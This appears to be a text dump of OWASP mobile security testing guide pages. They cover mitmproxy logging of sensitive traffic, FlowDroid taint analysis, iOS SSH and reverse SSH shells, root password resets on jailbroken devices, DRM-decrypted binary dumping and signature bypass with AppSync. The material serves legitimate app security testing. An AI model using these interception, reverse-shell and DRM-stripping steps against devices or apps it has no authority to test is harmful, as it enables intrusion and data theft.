Once mitmproxy is installed and your device is configured to use it, you can create a Python script to filter the traffic and extract the sensitive data. For example, the following script will extract all the data sent in the requests and responses only if the data is considered sensitive. For this example we consider sensitive data to be any data that contains the strings \"dummyPassword\" or \"sampleUser\", so we include them in the SENSITIVE_STRINGS
list.
# mitm_sensitive_logger.py\n\nfrom mitmproxy import http\n\n# This data would come from another file and should be defined after identifying the data that is considered sensitive for this application.\n# For example by using the Google Play Store Data Safety section.\nSENSITIVE_DATA = {\n \"precise_location_latitude\": \"37.7749\",\n \"precise_location_longitude\": \"-122.4194\",\n \"name\": \"John Doe\",\n \"email_address\": \"john.doe@example.com\",\n \"phone_number\": \"+11234567890\",\n \"credit_card_number\": \"1234 5678 9012 3456\"\n}\n\nSENSITIVE_STRINGS = SENSITIVE_DATA.values()\n\ndef contains_sensitive_data(string):\n return any(sensitive in string for sensitive in SENSITIVE_STRINGS)\n\ndef process_flow(flow):\n url = flow.request.pretty_url\n request_headers = flow.request.headers\n request_body = flow.request.text\n response_headers = flow.response.headers if flow.response else \"No response\"\n response_body = flow.response.text if flow.response else \"No response\"\n\n if (contains_sensitive_data(url) or \n contains_sensitive_data(request_body) or \n contains_sensitive_data(response_body)):\n with open(\"sensitive_data.log\", \"a\") as file:\n if flow.response:\n file.write(f\"RESPONSE URL: {url}\\n\")\n file.write(f\"Response Headers: {response_headers}\\n\")\n file.write(f\"Response Body: {response_body}\\n\\n\")\n else:\n file.write(f\"REQUEST URL: {url}\\n\")\n file.write(f\"Request Headers: {request_headers}\\n\")\n file.write(f\"Request Body: {request_body}\\n\\n\")\ndef request(flow: http.HTTPFlow):\n process_flow(flow)\n\ndef response(flow: http.HTTPFlow):\n process_flow(flow)\n
Now you can run mitmproxy with the script:
mitmdump -s mitm_sensitive_logger.py\n
Our example app has this code:
fun testPostRequest() {\n val thread = Thread {\n try {\n val url = URL(\"https://httpbin.org/post\")\n val httpURLConnection = url.openConnection() as HttpURLConnection\n httpURLConnection.requestMethod = \"POST\"\n httpURLConnection.doOutput = true\n httpURLConnection.setRequestProperty(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n val user = \"sampleUser\"\n val password = \"dummyPassword\"\n\n val postData = \"username=$user&password=$password\"\n\n val outputStream = BufferedOutputStream(httpURLConnection.outputStream)\n val bufferedWriter = BufferedWriter(OutputStreamWriter(outputStream, \"UTF-8\"))\n bufferedWriter.write(postData)\n bufferedWriter.flush()\n bufferedWriter.close()\n outputStream.close()\n\n val responseCode = httpURLConnection.responseCode\n if (responseCode == HttpURLConnection.HTTP_OK) {\n Log.d(\"HTTP_SUCCESS\", \"Successfully authenticated.\")\n } else {\n Log.e(\"HTTP_ERROR\", \"Failed to authenticate. Response code: $responseCode\")\n }\n\n } catch (e: Exception) {\n e.printStackTrace()\n }\n }\n thread.start()\n}\n
The app sends a POST request to https://httpbin.org/post
with the body username=sampleUser&password=dummyPassword
. httpbin.org
is a website that returns the request data in the response body, so we can see the data that was sent in the request.
Run the app and use it as you normally would. The script will log any sensitive data that is sent over the network to the sensitive_data.log
file.
Example console output:
[10:07:59.348] Loading script mitm_sensitive_logger.py\n[10:07:59.351] HTTP(S) proxy listening at *:8080.\n[10:08:08.188][127.0.0.1:64701] server connect httpbin.org:443 (52.206.94.89:443)\n[10:08:08.192][127.0.0.1:64709] server connect mas.owasp.org:443 (104.22.27.77:443)\n[10:08:08.245][127.0.0.1:64709] Client TLS handshake failed. The client does not trust the proxy's certificate for mas.owasp.org (OpenSSL Error([('SSL routines', '', 'ssl/tls alert certificate unknown')]))\n[10:08:08.246][127.0.0.1:64709] client disconnect\n[10:08:08.246][127.0.0.1:64709] server disconnect mas.owasp.org:443 (104.22.27.77:443)\n127.0.0.1:64701: POST https://httpbin.org/post\n << 200 OK 548b\n
Example sensitive_data.log
output:
REQUEST URL: https://httpbin.org/post\nRequest Headers: Headers[(b'Content-Type', b'application/x-www-form-urlencoded'), (b'User-Agent', b'Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)'), (b'Host', b'httpbin.org'), (b'Connection', b'Keep-Alive'), (b'Accept-Encoding', b'gzip'), (b'Content-Length', b'42')]\nRequest Body: username=sampleUser&password=dummyPassword\n\nRESPONSE URL: https://httpbin.org/post\nResponse Headers: Headers[(b'Date', b'Tue, 16 Jan 2024 09:08:08 GMT'), (b'Content-Type', b'application/json'), (b'Content-Length', b'548'), (b'Connection', b'keep-alive'), (b'Server', b'gunicorn/19.9.0'), (b'Access-Control-Allow-Origin', b'*'), (b'Access-Control-Allow-Credentials', b'true')]\nResponse Body: {\n \"args\": {}, \n \"data\": \"\", \n \"files\": {}, \n \"form\": {\n \"password\": \"dummyPassword\", \n \"username\": \"sampleUser\"\n }, \n \"headers\": {\n \"Accept-Encoding\": \"gzip\", \n \"Content-Length\": \"42\", \n \"Content-Type\": \"application/x-www-form-urlencoded\", \n \"Host\": \"httpbin.org\", \n \"User-Agent\": \"Dalvik/2.1.0 (Linux; U; Android 13; sdk_gphone64_arm64 Build/TE1A.220922.021)\", \n \"X-Amzn-Trace-Id\": \"Root=1-65a64778-78495e9f5d742c9b0c7a75d8\"\n }, \n \"json\": null, \n \"origin\": \"148.141.65.87\", \n \"url\": \"https://httpbin.org/post\"\n}\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0108/","title":"Taint Analysis","text":"Taint analysis is an information flow analysis technique that tracks the flow of sensitive information within a program. For example, it can determine whether geolocation data collected in an Android app is being transmitted to third-party domains.
In taint analysis, data flows from a \"source\" to a \"sink\". A source is where sensitive information originates, and a sink is where this information is ultimately utilized. For instance, we can determine if the device ID retrieved by a getDeviceId()
function is transmitted as a text message via another function sendTextMessage()
. In this scenario, getDeviceId()
is the source, and sendTextMessage()
is the sink. If a direct path exists between them, it's called a leak.
In large applications, manual information flow analysis can be very time consuming and inaccurate. Taint analysis automates this, with two main methods: static and dynamic. The former examines code without running it, offering broad coverage but potentially yielding false positives. In contrast, dynamic analysis observes real-time application execution, providing actual context but possibly overlooking untriggered issues. A thorough comparison of these techniques is beyond this section's scope.
There are multiple tools which perform taint analysis on native code, including Triton and bincat. However, in this section, we'll primarily focus on Android Java code and utilize FlowDroid for the taint analysis. Another notable tool supporting taint analysis for Android apps is GDA.
For our demonstration, we'll use the FlowDroid command line tool to perform taint analysis on the InsecureShop v1.0 application.
The InsecureShop app accepts a username and password as input and stores them in the app's shared preferences. In our taint analysis, we're interested in how this stored username and password are used. In this context, the username and password are the sensitive information, and reading from shared preferences is the source. The sink in this analysis could be various operations, such as sending info over the network, transmitting info via an Intent
, or storing info in an external file.
To use FlowDroid, firstly, we need to provide an input list of potential sources and sinks to evaluate for. In our case, reading from shared preferences will be the source, while adding parameters to an Intent
will be the sink. The configuration file will look as follows (we'll name it \"source_sink.txt\"):
<android.content.SharedPreferences: java.lang.String getString(java.lang.String, java.lang.String)> -> _SOURCE_\n\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.CharSequence)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,char)> -> _SINK_\n<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)> -> _SINK_\n
To invoke FlowDroid via the command line, use the following command:
java -jar soot-infoflow-cmd/target/soot-infoflow-cmd-jar-with-dependencies.jar \\\n -a InsecureShop.apk \\\n -p Android/Sdk/platforms \\\n -s source_sink.txt\n\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"password\", $r5) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"password\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getPassword()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - The sink virtualinvoke r2.<android.content.Intent: android.content.Intent putExtra(java.lang.String,java.lang.String)>(\"username\", $r4) in method <com.insecureshop.AboutUsActivity: void onSendData(android.view.View)> was called with values from the following sources:\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication$InPlaceInfoflow - - $r1 = interfaceinvoke $r2.<android.content.SharedPreferences: java.lang.String getString(java.lang.String,java.lang.String)>(\"username\", \"\") in method <com.insecureshop.util.Prefs: java.lang.String getUsername()>\n\n...\n\n[main] INFO soot.jimple.infoflow.android.SetupApplication - Found 2 leaks\n
The output also uses the jimple intermediate representation and reveals two leaks in the application, each corresponding to the username and password. Given that the InsecureShop app is open-source, we can refer to its source code to validate the findings, as shown below:
// file: AboutActivity.kt\n\nfun onSendData(view: View) {\n val userName = Prefs.username!!\n val password = Prefs.password!!\n\n val intent = Intent(\"com.insecureshop.action.BROADCAST\")\n intent.putExtra(\"username\", userName)\n intent.putExtra(\"password\", password)\n sendBroadcast(intent)\n\n textView.text = \"InsecureShop is an intentionally designed vulnerable android app built in Kotlin.\"\n\n }\n
Taint analysis is especially beneficial for automating data flow analysis in intricate applications. However, given the complexity of some apps, the accuracy of such tools can vary. Thus, it's essential for reviewers to find a balance between the accuracy of tools and the time spent on manual analysis.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0047/","title":"Reverse Engineering","text":"Reverse engineering is the process of taking an app apart to find out how it works. You can do this by examining the compiled app (static analysis), observing the app during runtime (dynamic analysis), or a combination of both.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0048/","title":"Static Analysis","text":"For white-box source code testing, you'll need a setup similar to the developer's setup, including a test environment that includes the Android SDK and an IDE. Access to either a physical device or an emulator (for debugging the app) is recommended.
During black-box testing, you won't have access to the original form of the source code. You'll usually have the application package in Android's APK format, which can be installed on an Android device or reverse engineered as explained in the section \"Disassembling and Decompiling\".
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/","title":"Dynamic Analysis","text":"Dynamic Analysis tests the mobile app by executing and running the app binary and analyzing its workflows for vulnerabilities. For example, vulnerabilities regarding data storage might sometimes be hard to catch during static analysis, but in dynamic analysis you can easily spot what information is stored persistently and if the information is protected properly. Besides this, dynamic analysis allows the tester to properly identify:
Analysis can be assisted by automated tools, such as MobSF, while assessing an application. An application can be assessed by side-loading it, re-packaging it, or by simply attacking the installed version.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0049/#basic-information-gathering","title":"Basic Information Gathering","text":"As mentioned previously, Android runs on top of a modified Linux kernel and retains the proc filesystem (procfs) from Linux, which is mounted at /proc
. Procfs provides a directory-based view of a process running on the system, providing detailed information about the process itself, its threads, and other system-wide diagnostics. Procfs is arguably one of the most important filesystems on Android, where many OS native tools depend on it as their source of information.
Many command line tools are not shipped with the Android firmware to reduce the size, but can be easily installed on a rooted device using BusyBox. We can also create our own custom scripts using commands like cut
, grep
, sort
etc, to parse the proc filesystem information.
In this section, we will be using information from procfs directly or indirectly to gather information about a running process.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0050/","title":"Binary Analysis","text":"Binary analysis frameworks give you powerful ways to automate tasks that would be almost impossible to do manually. Binary analysis frameworks typically use a technique called symbolic execution, which allows you to determine the conditions necessary to reach a specific target. It translates the program's semantics into a logical formula in which some variables are represented by symbols with specific constraints. By resolving the constraints, you can find the conditions necessary for the execution of some branch of the program.
"},{"location":"MASTG/techniques/generic/MASTG-TECH-0051/","title":"Tampering and Runtime Instrumentation","text":"First, we'll look at some simple ways to modify and instrument mobile apps. Tampering means making patches or runtime changes to the app to affect its behavior. For example, you may want to deactivate SSL pinning or binary protections that hinder the testing process. Runtime Instrumentation encompasses adding hooks and runtime patches to observe the app's behavior. In mobile application security however, the term loosely refers to all kinds of runtime manipulation, including overriding methods to change behavior.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/","title":"Accessing the Device Shell","text":"One of the most common things you do when testing an app is accessing the device shell. In this section we'll see how to access the iOS shell both remotely from your host computer with/without a USB cable and locally from the device itself.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#remote-shell","title":"Remote Shell","text":"In contrast to Android where you can easily access the device shell using the adb tool, on iOS you only have the option to access the remote shell via SSH. This also means that your iOS device must be jailbroken in order to connect to its shell from your host computer. For this section we assume that you've properly jailbroken your device and have either Cydia (see screenshot below) or Sileo installed. In the rest of the guide we will reference to Cydia, but the same packages should be available in Sileo.
In order to enable SSH access to your iOS device you can install the OpenSSH package. Once installed, be sure to connect both devices to the same Wi-Fi network and take a note of the device IP address, which you can find in the Settings -> Wi-Fi menu and tapping once on the info icon of the network you're connected to.
You can now access the remote device's shell by running ssh root@<device_ip_address>
, which will log you in as the root user:
$ ssh root@192.168.197.234\nroot@192.168.197.234's password:\niPhone:~ root#\n
Press Control + D or type exit
to quit.
When accessing your iOS device via SSH consider the following:
root
and mobile
.alpine
.Remember to change the default password for both users root
and mobile
as anyone on the same network can find the IP address of your device and connect via the well-known default password, which will give them root access to your device.
If you forget your password and want to reset it to the default alpine
:
/private/etc/master.passwd on your jailbroken iOS device (using an on-device shell as shown below) 
on your jailbroken iOS device (using an on-device shell as shown below) root:xxxxxxxxx:0:0::0:0:System Administrator:/var/root:/bin/sh\n mobile:xxxxxxxxx:501:501::0:0:Mobile User:/var/mobile:/bin/sh\n
xxxxxxxxx
to /smx7MYTQIi2M
(which is the hashed password alpine
)During a real black box test, a reliable Wi-Fi connection may not be available. In this situation, you can use usbmuxd to connect to your device's SSH server via USB.
Connect macOS to an iOS device by installing and starting iproxy:
$ brew install libimobiledevice\n$ iproxy 2222 22\nwaiting for connection\n
The above command maps port 22
on the iOS device to port 2222
on localhost. You can also make iproxy run automatically in the background if you don't want to run the binary every time you want to SSH over USB.
With the following command in a new terminal window, you can connect to the device:
$ ssh -p 2222 root@localhost\nroot@localhost's password:\niPhone:~ root#\n
Small note on USB of an iDevice: on an iOS device you cannot make data connections anymore after 1 hour of being in a locked state, unless you unlock it again due to the USB Restricted Mode, which was introduced with iOS 11.4.1
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0052/#on-device-shell-app","title":"On-device Shell App","text":"While usually using an on-device shell (terminal emulator) might be very tedious compared to a remote shell, it can prove handy for debugging in case of, for example, network issues or checking some configuration. For example, you can install NewTerm 2 via Cydia for this purpose (it supports iOS 6.0 to 12.1.2 at the time of this writing).
In addition, there are a few jailbreaks that explicitly disable incoming SSH for security reasons. In those cases, it is very convenient to have an on-device shell app, which you can use to first SSH out of the device with a reverse shell, and then connect from your host computer to it.
Opening a reverse shell over SSH can be done by running the command ssh -R <remote_port>:localhost:22 <username>@<host_computer_ip>
.
On the on-device shell app run the following command and, when asked, enter the password of the mstg
user of the host computer:
ssh -R 2222:localhost:22 mstg@192.168.197.235\n
On your host computer run the following command and, when asked, enter the password of the root
user of the iOS device:
ssh -p 2222 root@localhost\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/","title":"Host-Device Data Transfer","text":"There are various scenarios where you might need to transfer data from the iOS device or app data sandbox to your host computer or vice versa. The following section will show you different ways to achieve that.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#copying-app-data-files-via-ssh-and-scp","title":"Copying App Data Files via SSH and SCP","text":"As we know now, files from our app are stored in the Data directory. You can now simply archive the Data directory with tar
and pull it from the device with scp
:
iPhone:~ root# tar czvf /tmp/data.tgz /private/var/mobile/Containers/Data/Application/8C8E7EB0-BC9B-435B-8EF8-8F5560EB0693\niPhone:~ root# exit\n$ scp -P 2222 root@localhost:/tmp/data.tgz .\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0053/#grapefruit","title":"Grapefruit","text":"After starting Grapefruit you can select the app that is in scope for testing. There are various functions available, of which one is called \"Finder\". When selecting it, you will get a listing of the directories of the app sandbox.
When navigating through the directories and selecting a file, a pop-up will show up and display the data either as hexadecimal or text. When closing this pop-up you have various options available for the file, including:
When you are starting objection you will find the prompt within the Bundle directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # pwd print\nCurrent directory: /var/containers/Bundle/Application/DABF849D-493E-464C-B66B-B8B6C53A4E76/org.owasp.MSTG.app\n
Use the env
command to get the directories of the app and navigate to the Documents directory.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # cd /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n/var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/Documents\n
With the command file download <filename>
you can download a file from the iOS device to your host computer and can analyze it afterwards.
org.owasp.MSTG on (iPhone: 10.3.3) [usb] # file download .com.apple.mobile_container_manager.metadata.plist\nDownloading /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\nStreaming file from device...\nWriting bytes to destination...\nSuccessfully downloaded /var/mobile/Containers/Data/Application/72C7AAFB-1D75-4FBA-9D83-D8B4A2D44133/.com.apple.mobile_container_manager.metadata.plist to .com.apple.mobile_container_manager.metadata.plist\n
You can also upload files to the iOS device with file upload <local_file_path>
.
During development, apps are sometimes provided to testers via over-the-air (OTA) distribution. In that situation, you'll receive an itms-services link, such as the following:
itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\n
You can use the ITMS services asset downloader tool to download the IPA from an OTA distribution URL. Install it via npm:
npm install -g itms-services\n
Save the IPA file locally with the following command:
# itms-services -u \"itms-services://?action=download-manifest&url=https://s3-ap-southeast-1.amazonaws.com/test-uat/manifest.plist\" -o - > out.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#extracting-the-app-binary","title":"Extracting the App Binary","text":"If you have an IPA with a decrypted app binary, unzip it and you are ready to go. The app binary is located in the main bundle directory (.app), e.g. Payload/Telegram X.app/Telegram X
. See the following subsection for details on the extraction of the property lists.
On macOS's Finder, .app directories are opened by right-clicking them and selecting \"Show Package Content\". On the terminal you can just cd
into them.
IMPORTANT NOTE: In the United States, the Digital Millennium Copyright Act 17 U.S.C. 1201, or DMCA, makes it illegal and actionable to circumvent certain types of DRM. However, the DMCA also provides exemptions, such as for certain kinds of security research. A qualified attorney can help you determine if your research qualifies under the DMCA exemptions. (Source: Corellium)
If you don't have the original IPA, then you need a jailbroken device where you will install the app (e.g. via App Store). Once installed, you need to extract the app binary from memory and rebuild the IPA file. Because of DRM, the app binary file is encrypted when it is stored on the iOS device, so simply pulling it from the Bundle (either through SSH or Objection) will not be sufficient to reverse engineer it.
You can verify this by running this command on the app binary:
otool -l Payload/Telegram X.app/Telegram X | grep -i LC_ENCRYPTION -B1 -A4\nLoad command 12\n cmd LC_ENCRYPTION_INFO\n cmdsize 20\n cryptoff 16384\n cryptsize 32768\n cryptid 1\n
Or with radare2:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto true\n
In order to retrieve the unencrypted version, you can use frida-ios-dump. It will extract the unencrypted version from memory while the application is running on the device.
First, configure Frida-ios-dump dump.py
:
localhost
with port 2222
when using iproxy, or to the actual IP address and port of the device from which you want to dump the binary.User = 'root'
) and password (Password = 'alpine'
) in dump.py
to the ones you have set.Enumerate the apps installed on the device by running python dump.py -l
:
PID Name Identifier\n---- --------------- -------------------------------------\n 860 Cydia com.saurik.Cydia\n1130 Settings com.apple.Preferences\n 685 Mail com.apple.mobilemail\n 834 Telegram ph.telegra.Telegraph\n - Stocks com.apple.stocks\n ...\n
You can dump the selected app, for example Telegram, by running python dump.py ph.telegra.Telegraph
After a couple of seconds, the Telegram.ipa
file will be created in your current directory. You can validate the success of the dump by removing the app and reinstalling it (e.g. using ios-deploy ios-deploy -b Telegram.ipa
). Note that this will only work on jailbroken devices, as otherwise the signature won't be valid.
You can verify that the app binary is now unencrypted:
rabin2 -I Payload/Telegram X.app/Telegram X | grep crypto\ncrypto false\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0054/#thinning-the-app-binary","title":"Thinning the App Binary","text":"The app binary may contain multiple architectures, such as armv7
(32-bit) and arm64
(64-bit). That is called a \"fat binary\".
One example is the Damn Vulnerable iOS App DVIA v1 to demonstrate this.
Unzip the app and run otool:
unzip DamnVulnerableiOSApp.ipa\ncd Payload/DamnVulnerableIOSApp.app\notool -hv DamnVulnerableIOSApp\n
The output will look like this:
DamnVulnerableIOSApp (architecture armv7):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\n MH_MAGIC ARM V7 0x00 EXECUTE 33 3684 NOUNDEFS DYLDLINK TWOLEVEL PIE\nDamnVulnerableIOSApp (architecture arm64):\nMach header\n magic cputype cpusubtype caps filetype ncmds sizeofcmds flags\nMH_MAGIC_64 ARM64 ALL 0x00 EXECUTE 33 4192 NOUNDEFS DYLDLINK TWOLEVEL PIE\n
To ease the app analysis, it's recommended to create a so-called thin binary, which contains one architecture only:
lipo -thin armv7 DamnVulnerableIOSApp -output DVIA32\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0055/","title":"Repackaging Apps","text":"If you need to test on a non-jailbroken device you should learn how to repackage an app to enable dynamic testing on it.
Use a computer with macOS to perform all the steps indicated in the article \"Patching iOS Applications\" from the objection Wiki. Once you're done you'll be able to patch an IPA by calling the objection command:
objection patchipa --source my-app.ipa --codesign-signature 0C2E8200Dxxxx\n
Finally, the app needs to be installed (sideloaded) and run with debugging communication enabled. Perform the steps from the article \"Running Patched iOS Applications\" from the objection Wiki (using ios-deploy).
ios-deploy --bundle Payload/my-app.app -W -d\n
Refer to \"Installing Apps\" to learn about other installation methods. Some of them don't require you to have macOS.
This repackaging method is enough for most use cases. For more advanced repackaging, refer to \"iOS Tampering and Reverse Engineering - Patching, Repackaging and Re-Signing\".
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/","title":"Installing Apps","text":"When you install an application without using Apple's App Store, this is called sideloading. There are various ways of sideloading which are described below. On the iOS device, the actual installation process is then handled by the installd daemon, which will unpack and install the application. To integrate app services or be installed on an iOS device, all applications must be signed with a certificate issued by Apple. This means that the application can be installed only after successful code signature verification. On a jailbroken phone, however, you can circumvent this security feature with AppSync, a package available in the Cydia store. It contains numerous useful applications that leverage jailbreak-provided root privileges to execute advanced functionality. AppSync is a tweak that patches installd, allowing the installation of fake-signed IPA packages.
Different methods exist for installing an IPA package onto an iOS device, which are described in detail below.
Please note that iTunes is no longer available in macOS Catalina. If you are using an older version of macOS, iTunes is still available but since iTunes 12.7 it is not possible to install apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#cydia-impactor","title":"Cydia Impactor","text":"Cydia Impactor was originally created to jailbreak iPhones, but has been rewritten to sign and install IPA packages to iOS devices via sideloading (and even APK files to Android devices). Cydia Impactor is available for Windows, macOS and Linux. A step by step guide and troubleshooting steps are available on yalujailbreak.net.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#libimobiledevice","title":"libimobiledevice","text":"On Linux and also macOS, you can alternatively use libimobiledevice, a cross-platform software protocol library and a set of tools for native communication with iOS devices. This allows you to install apps over a USB connection by executing ideviceinstaller. The connection is implemented with the USB multiplexing daemon usbmuxd, which provides a TCP tunnel over USB.
The package for libimobiledevice will be available in your Linux package manager. On macOS you can install libimobiledevice via brew:
brew install libimobiledevice\nbrew install ideviceinstaller\n
After the installation you have several new command line tools available, such as ideviceinfo
, ideviceinstaller
or idevicedebug
.
# The following command will show detailed information about the iOS device connected via USB.\n$ ideviceinfo\n# The following command will install the IPA to your iOS device.\n$ ideviceinstaller -i iGoat-Swift_v1.0-frida-codesigned.ipa\n...\nInstall: Complete\n# The following command will start the app in debug mode, by providing the bundle name. The bundle name can be found in the previous command after \"Installing\".\n$ idevicedebug -d run OWASP.iGoat-Swift\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ipainstaller","title":"ipainstaller","text":"The IPA can also be directly installed on the iOS device via the command line with ipainstaller. After copying the file over to the device, for example via scp, you can execute ipainstaller with the IPA's filename:
ipainstaller App_name.ipa\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#ios-deploy","title":"ios-deploy","text":"On macOS you can also use the ios-deploy tool to install iOS apps from the command line. You'll need to unzip your IPA since ios-deploy uses the app bundles to install apps.
unzip Name.ipa\nios-deploy --bundle 'Payload/Name.app' -W -d -v\n
After the app is installed on the iOS device, you can simply start it by adding the -m
flag which will directly start debugging without installing the app again.
ios-deploy --bundle 'Payload/Name.app' -W -d -v -m\n
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0056/#xcode","title":"Xcode","text":"It is also possible to use the Xcode IDE to install iOS apps by doing the following steps:
Sometimes an application can require to be used on an iPad device. If you only have iPhone or iPod touch devices then you can force the application to accept to be installed and used on these kinds of devices. You can do this by changing the value of the property UIDeviceFamily to the value 1 in the Info.plist file.
<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n\n <key>UIDeviceFamily</key>\n <array>\n <integer>1</integer>\n </array>\n\n</dict>\n</plist> \n
It is important to note that changing this value will break the original signature of the IPA file so you need to re-sign the IPA, after the update, in order to install it on a device on which the signature validation has not been disabled.
This bypass might not work if the application requires capabilities that are specific to modern iPads while your iPhone or iPod is a bit older.
Possible values for the property UIDeviceFamily can be found in the Apple Developer documentation.
One fundamental step when analyzing apps is information gathering. This can be done by inspecting the app package on your host computer or remotely by accessing the app data on the device. You'll find more advanced techniques in the subsequent chapters but, for now, we will focus on the basics: getting a list of all installed apps, exploring the app package and accessing the app data directories on the device itself. This should give you a bit of context about what the app is all about without even having to reverse engineer it or perform more advanced analysis. We will be answering questions such as:
When targeting apps that are installed on the device, you'll first have to figure out the correct bundle identifier of the application you want to analyze. You can use frida-ps -Uai
to get all apps (-a
) currently installed (-i
) on the connected USB device (-U
):
$ frida-ps -Uai\n PID Name Identifier\n---- ------------------- -----------------------------------------\n6847 Calendar com.apple.mobilecal\n6815 Mail com.apple.mobilemail\n - App Store com.apple.AppStore\n - Apple Store com.apple.store.Jolly\n - Calculator com.apple.calculator\n - Camera com.apple.camera\n - iGoat-Swift OWASP.iGoat-Swift\n
It also shows which of them are currently running. Take a note of the \"Identifier\" (bundle identifier) and the PID if any as you'll need them afterwards.
You can also directly open Grapefruit and after selecting your iOS device you'll get the list of installed apps.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/","title":"Exploring the App Package","text":"Once you have collected the package name of the application you want to target, you'll want to start gathering information about it. First, retrieve the IPA as explained in Basic Testing Operations - Obtaining and Extracting Apps.
You can unzip the IPA using the standard unzip
or any other ZIP utility. Inside you'll find a Payload
folder containing the so-called Application Bundle (.app). The following is an example of the output; note that it was truncated for better readability and overview:
$ ls -1 Payload/iGoat-Swift.app\nrutger.html\nmansi.html\nsplash.html\nabout.html\n\nLICENSE.txt\nSentinel.txt\nREADME.txt\n\nURLSchemeAttackExerciseVC.nib\nCutAndPasteExerciseVC.nib\nRandomKeyGenerationExerciseVC.nib\nKeychainExerciseVC.nib\nCoreData.momd\narchived-expanded-entitlements.xcent\nSVProgressHUD.bundle\n\nBase.lproj\nAssets.car\nPkgInfo\n_CodeSignature\nAppIcon60x60@3x.png\n\nFrameworks\n\nembedded.mobileprovision\n\nCredentials.plist\nAssets.plist\nInfo.plist\n\niGoat-Swift\n
The most relevant items are:
Info.plist
contains configuration information for the application, such as its bundle ID, version number, and display name._CodeSignature/
contains a plist file with a signature over all files in the bundle.Frameworks/
contains the app native libraries as .dylib or .framework files.PlugIns/
may contain app extensions as .appex files (not present in the example).*.nib
files (storing the user interfaces of iOS app), localized content (<language>.lproj
), text files, audio files, etc.The information property list or Info.plist
(named by convention) is the main source of information for an iOS app. It consists of a structured file containing key-value pairs describing essential configuration information about the app. Actually, all bundled executables (app extensions, frameworks and apps) are expected to have an Info.plist
file. You can find all possible keys in the Apple Developer Documentation.
The file might be formatted in XML or binary (bplist). You can convert it to XML format with one simple command:
plutil
, which is a tool that comes natively with macOS 10.2 and above versions (no official online documentation is currently available):plutil -convert xml1 Info.plist\n
apt install libplist-utils\nplistutil -i Info.plist -o Info_xml.plist\n
Here's a non-exhaustive list of some info and the corresponding keywords that you can easily search for in the Info.plist
file by just inspecting the file or by using grep -i <keyword> Info.plist
:
UsageDescription
(see \"iOS Platform APIs\")CFBundleURLTypes
(see \"iOS Platform APIs\")UTExportedTypeDeclarations
/ UTImportedTypeDeclarations
(see \"iOS Platform APIs\")NSAppTransportSecurity
(see \"iOS Network Communication\")Please refer to the mentioned chapters to learn more about how to test each of these points.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#app-binary","title":"App Binary","text":"iOS app binaries are fat binaries (they can be deployed on all devices 32- and 64-bit). In contrast to Android, where you can actually decompile the app binary to Java code, the iOS app binaries can only be disassembled.
Refer to the chapter Tampering and Reverse Engineering on iOS for more details.
"},{"location":"MASTG/techniques/ios/MASTG-TECH-0058/#native-libraries","title":"Native Libraries","text":"iOS apps can make their codebase modular by using different elements. In the MASTG we will refer to all of them as native libraries, but they can come in different forms:
.dylib
extension) are also used but must be part of a framework bundle. Standalone Dynamic Libraries are not supported on iOS, watchOS, or tvOS, except for the system Swift libraries provided by Xcode.XCFrameworks
): Xcode 11 supports distributing binary libraries using the XCFrameworks
format which is a new way to bundle up multiple variants of a Framework, e.g. for any of the platforms that Xcode supports (including simulator and devices). They can also bundle up static libraries (and their corresponding headers) and support binary distribution of Swift and C-based code. XCFrameworks
